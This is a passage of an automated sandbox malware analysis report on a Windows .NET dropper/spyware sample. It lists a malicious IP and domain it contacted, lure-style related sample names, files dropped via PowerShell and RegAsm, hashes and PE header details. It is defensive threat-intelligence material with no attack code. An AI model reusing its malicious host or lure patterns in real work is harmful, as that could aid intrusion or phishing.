                                                                                                https://www.nuget.org/packages/Newtonsoft.Json.BsonSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          141.98.6.102
                                                                                                          		sedesadre.gqGermany
                                                                                                          		33657CMCSUStrue

                                                                                                          Private

                                                                                                          IP
                                                                                                          192.168.2.1

                                                                                                          General Information

                                                                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                          Analysis ID:756117
                                                                                                          Start date and time:2022-11-29 16:49:18 +01:00
                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                          Overall analysis duration:0h 9m 29s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Sample file name:SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                          Number of analysed new started processes analysed:15
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • HDC enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@10/9@21/2
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HDC Information:Failed
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 99%
                                                                                                          • Number of executed functions: 28
                                                                                                          • Number of non-executed functions: 2
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
                                                                                                          • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, fs.microsoft.com, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-db-files-geo.onedrive.akadns.net, odc-db-files-brs.onedrive.akadns.net
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          16:51:09API Interceptor68x Sleep call for process: powershell.exe modified
                                                                                                          16:52:23API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe modified
                                                                                                          16:52:27API Interceptor14x Sleep call for process: RegAsm.exe modified

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          No context

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          l-0003.l-dc-msedge.netSecuriteInfo.com.Win32.Trojan-gen.31819.28757.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          000211232334_33455INVOICE .vbsGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          IMG_2022112022-6468.vbsGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          SecuriteInfo.com.Win32.Malware-gen.5701.3804.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          Swift Payment Copy .xla.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          03231262773662516627.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          Cogigqkbkuvzlh.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          Inquiry For RE UGS - LCL - INDONESIA.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          AZ032441352671726.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          CONFD-31 PROPOSED VILLA (B+G+1+PH) + MAJLIS .exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          Requisition Order.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          PRODUCTS_PROFILE.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          Delivery report.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          SecuriteInfo.com.Win32.Evo-gen.7732.16870.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          SecuriteInfo.com.Variant.Tedy.237947.19482.16084.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          Huat Tradings - Products Inquiry.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          Products Inquiry_Document.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          SecuriteInfo.com.Variant.Ransom.Gendarmerie.22.23590.8978.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          SecuriteInfo.com.Win32.PWSX-gen.19083.21703.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12
                                                                                                          Invoice Overdue & Error INV NR 522236562 DTD 25.10.2021 SK.exeGet hashmaliciousBrowse
                                                                                                          • 13.107.43.12

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          CMCSUSSecuriteInfo.com.Win32.CrypterX-gen.3242.29307.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.147
                                                                                                          SecuriteInfo.com.Win32.PWSX-gen.7894.18041.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.164
                                                                                                          MV COMMON CALYPSO.xlsGet hashmaliciousBrowse
                                                                                                          • 171.22.30.164
                                                                                                          Order Spec.PDF.jsGet hashmaliciousBrowse
                                                                                                          • 45.139.105.174
                                                                                                          iDhfdMWSQB_movar.jsGet hashmaliciousBrowse
                                                                                                          • 45.139.105.174
                                                                                                          Parts_Photos.jsGet hashmaliciousBrowse
                                                                                                          • 45.139.105.174
                                                                                                          wamafa.jsGet hashmaliciousBrowse
                                                                                                          • 45.139.105.174
                                                                                                          LPO-17-006AD.jsGet hashmaliciousBrowse
                                                                                                          • 45.139.105.174
                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.106
                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.106
                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.106
                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.106
                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.106
                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.106
                                                                                                          QQt3XHWcOQ.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.147
                                                                                                          DHL Package Delivery_pdf.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.164
                                                                                                          HpBUsbfKoI.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.164
                                                                                                          RFQ.xlsGet hashmaliciousBrowse
                                                                                                          • 171.22.30.164
                                                                                                          NEW ORDER PO137810205.xlsGet hashmaliciousBrowse
                                                                                                          • 171.22.30.147
                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                          • 171.22.30.106

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.log

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1537
                                                                                                          Entropy (8bit):5.3478589519339295
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKzvFHLHKdHKBqHKs:iqX9qxwCYqhQnoPtIxHeqzNrqdq4qs
                                                                                                          MD5:2A63347CC5F87ABDC744C637814F0C27
                                                                                                          SHA1:4795E5BE85E14E9BDAACB6D00E465F238FA3601F
                                                                                                          SHA-256:F4DCAC81A786946BE4394916C1A88F3C2EDD30660EEC190682793293D38BB865
                                                                                                          SHA-512:961AD4730F9361A6067005AD63EC8828EEA2755EE60754623E0879A2635ADF20BF731900936D555D6422D87AC10318A09A750C03612D12BB2C13815D95FC110E
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5829
                                                                                                          Entropy (8bit):4.8968676994158
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                                          MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                                          SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                                          SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                                          SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                                          Malicious:false
                                                                                                          Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15560
                                                                                                          Entropy (8bit):5.550696665565154
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:pte/e27IjK12pCbvlSBxnOulrISsFvIZA/4oXIYo:LO20B4xOulrYCilo
                                                                                                          MD5:18C379E4374BC2337F9F0D5394A3D7A1
                                                                                                          SHA1:8DEBC168CDEBAF36CAD9ED9DDD69512B742372FB
                                                                                                          SHA-256:4DD8B586651F70808C99483D02E9D19ADB96B728A402FDA3D0DE5D29FDA0936A
                                                                                                          SHA-512:5D1B414DD4F10BE191E64C203706F5BE73F976C971109B39F1483A705C082280B7274CB2FD71B683E6D1DEA4577E668E516ADC4255266BC2B00DDD8254EA8137
                                                                                                          Malicious:false
                                                                                                          Preview:@...e..................... ...........'..............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_150mte30.zn5.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdh4roqr.3j3.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hojog3ew.0sb.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kk3bso0d.u4o.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\eb42b1a5c308fc11edf1ddbdd25c8486_d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):50
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3::
                                                                                                          MD5:871BDD96B159C14D15C8D97D9111E9C8
                                                                                                          SHA1:8CD537A621659C289F0707BAD94719B5782DDB1F
                                                                                                          SHA-256:CC2786E1F9910A9D811400EDCDDAF7075195F7A16B216DCBEFBA3BC7C4F2AE51
                                                                                                          SHA-512:E116D2D486BC802E99D5FFE83A666D5E324887A65965C7E0D90B238A4EE1DB97E28F59AED23E6F968868902D762DF06146833BE62064C4A74D7C9384DFB0C7F6
                                                                                                          Malicious:false
                                                                                                          Preview:..................................................

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):3.7691875294894785
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                          File name:SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                                                                                                          File size:313856
                                                                                                          MD5:3039fa7b347872c33c247581a27a7560
                                                                                                          SHA1:69832bbe446653f7d10eccf07069e73230138af8
                                                                                                          SHA256:f949fda96d4810c4ffa941ecce00160b984cf7ac32cf1ca88dd4dd9583f2e480
                                                                                                          SHA512:175e3f5c4bb39e490c2b25f02e623317923b02f976f7dfc029d0213ca5d3ef2b31deef01fd9a355fdf8d5eea826130e56e45723ab2004d3797de4e11cd4053d2
                                                                                                          SSDEEP:1536:rLc62Vr2beD+oPKjg7cMpdLVPZby1U/r3EVi6DXxhoa:12VCkVUXL
                                                                                                          TLSH:81648E9A9D721284F5154D33E5BBCBA8FB125EA427AD712B2E4C7530063317B2BAF131
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c............................v4... ...@....@.. ....................... ............`................................

                                                                                                          File Icon

                                                                                                          Icon Hash:92b21472696d3916

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x403476
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x6385E7BE [Tue Nov 29 11:06:38 2022 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x341c0x57.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x4afcc.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x500000xc.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x20000x147c0x1600False0.5161576704545454data5.268731127158798IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x40000x4afcc0x4b000False0.050693359375data3.6559178414965716IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
